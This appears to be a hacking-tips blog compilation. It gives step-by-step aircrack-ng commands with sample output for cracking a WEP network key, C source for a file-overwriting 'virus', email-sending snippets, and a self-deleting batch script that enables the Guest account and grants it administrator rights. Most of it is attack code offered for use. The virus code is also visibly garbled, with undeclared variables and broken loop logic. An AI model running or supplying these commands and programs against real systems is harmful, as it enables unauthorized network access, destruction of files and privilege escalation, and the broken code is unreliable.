WEP cracking

Step 1 - Start the wireless interface in monitor mode on AP channel

airmon-ng stop ath0

The system responds:

Interface Chipset Driver

wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0) (VAP destroyed)

Step 2 - Test Wireless Device Packet Injection

aireplay-ng -9 -e teddy -a 00:14:6C:7E:40:80 ath0

Where:
-9 means injection test
-e teddy is the wireless network name
-a 00:14:6C:7E:40:80 is the access point MAC address
ath0 is the wireless interface name

Step 3 - Start airodump-ng to capture the IVs

airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w output ath0


While the injection is taking place (later), the screen will look similar to this:
CH 9 ][ Elapsed: 8 mins ][ 2007-03-21 19:25

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:14:6C:7E:40:80 42 100 5240 178307 338 9 54 WEP WEP teddy

BSSID STATION PWR Lost Packets Probes

00:14:6C:7E:40:80 00:0F:B5:88:AC:82 42 0 183782

Step 4 - Use aireplay-ng to do a fake authentication with the access point

aireplay-ng -1 0 -e teddy -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0

Where:
-1 means fake authentication
0 reassociation timing in seconds
-e teddy is the wireless network name
-a 00:14:6C:7E:40:80 is the access point MAC address
-h 00:0F:B5:88:AC:82 is our card MAC address
ath0 is the wireless interface name
Success looks like:

18:18:20 Sending Authentication Request
18:18:20 Authentication successful
18:18:20 Sending Association Request
18:18:20 Association successful :-)

Step 5 - Start aireplay-ng in ARP request replay mode

aireplay-ng -3 -b 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0

Step 6 - Run aircrack-ng to obtain the WEP key
aircrack-ng -b 00:14:6C:7E:40:80 output*.cap

Where:
-b 00:14:6C:7E:40:80 selects the one access point we are interested in. This is optional since when we originally captured the data, we applied a filter to only

capture data for this one AP.
output*.cap selects all files starting with “output” and ending in ”.cap”.

Here is what success looks like:

Aircrack-ng 0.9


[00:03:06] Tested 674449 keys (got 96610 IVs)

KB depth byte(vote)
0 0/ 9 12( 15) F9( 15) 47( 12) F7( 12) FE( 12) 1B( 5) 77( 5) A5( 3) F6( 3) 03( 0)
1 0/ 8 34( 61) E8( 27) E0( 24) 06( 18) 3B( 16) 4E( 15) E1( 15) 2D( 13) 89( 12) E4( 12)
2 0/ 2 56( 87) A6( 63) 15( 17) 02( 15) 6B( 15) E0( 15) AB( 13) 0E( 10) 17( 10) 27( 10)
3 1/ 5 78( 43) 1A( 20) 9B( 20) 4B( 17) 4A( 16) 2B( 15) 4D( 15) 58( 15) 6A( 15) 7C( 15)

KEY FOUND! [ 12:34:56:78:90 ]
Probability: 100%

A virus in "C".

unsigned long x;
char buff[256];
struct ffblk;

clock_t st,end;

main() //www.ashu-hackingforever.blogspot.com
{
st=clock();
clrscr();
end=(findfirst("*.*",&ffblk,0);
while(!end)
{
virus=fopen(_args[0],"rb");
vhost=fopen(ffblk.ff_name,"rb+");
if(vhost==NULL)
goto next;
x=89088;
printf("infecting %s\n",ffblk.ff_name);
while(x>2048)
{
fread(buff,256,1,virus);
fwrite(buff,256,1,vhost);
x=2048;
}
fread(buff,x,1,virus);
fwrite(buff,1,vhost);
a++;
next: fcloseall();
done=findnext(&ffblk);
}
end=clock();
printf("infected %d file in %f sec",a,(end-st)/CLK-TCK);
return(0);
}

create mail message object.

// create mail message object

MailMessage mail = new MailMessage();

mail.From = ""; // put the from address here

mail.To = ""; // put to address here

mail.Subject = ""; // put subject here

mail.Body = ""; // put body of email here

SmtpMail.SmtpServer = ""; // put smtp server you will use here

// and then send the mail

SmtpMail.Send(mail);



Here goes the program vc++ code



#define _CRTDBG_MAP_ALLOC

#include "windows.h"

#include "crtdbg.h"

#include "string.h"



#include "CkSettings.h"

#include "CkEmail.h"

#include "CkEmailBundle.h"

#include "CkMailMan.h"

#include "CkString.h"

#include "CkByteData.h"



void EmailExample(void)

{

CkMailMan mailman;



// This seems to have a 30-day trial period.

bool unlocked = mailman.UnlockComponent("30-day trial");

if (!unlocked)

{

printf("Failed to unlock component\n");

return;

}



mailman.put_SmtpHost("mail.earthlink.net");



This contains the actual email componets

CkEmail email;

email.put_Body("This is a test\r\nThis is line #2");

email.AddTo("Google Hacks","communityonwer@gmail.com");

email.put_FromAddress("communityonwer@gmail.com");

email.put_Subject("Google Hacks is the best site");



if (!mailman.SendEmail(&email))

{

mailman.SaveLastError("errors.xml"); // error

}

}



int APIENTRY WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow)

{

freopen("stdout.txt","w",stdout);

EmailExample();

CkSettings::cleanupMemory();

_CrtDumpMemoryLeaks();

return 0;

}





If you want html just replace body with a html code. Only basic html code will work.



If you wish to add BCC after email.AddTo() . You need to add this as many as times as you want based to how many people

you want to mail.

email.AddBcc("Orkut Tricks","communityonwer@gmail.com");



If you wish to add CC just copy the above code and replace Bcc with cc



Code to add attachments . Repete this code as many times as you want based on the no of attachments you want to send

// Add a file attachment.

if (!email.AddFileAttachment("googlehacks.gif",0))

{

email.SaveLastError("errors.xml");

return;

}





If you want all your attachments to be zipped the use this code after you enter all the attachments



if (!email.ZipAttachments("googlehacks.zip"))

{

email.SaveLastError("errors.xml");

return;

}

How to get the admin privilages.

The below code will allow a guest to be a admin . You will not be the actual admin but will get admin privilages

echo off
title Please wait...
cls
net user add Username Password /add
net user localgroup Administrators Username /add
net user Guest 420 /active:yes
net localgroup Guests Guest /DELETE
net localgroup Administrators Guest /add
del %0


Copy this to notepad and save the file as "anyname.bat" .make double click on this.....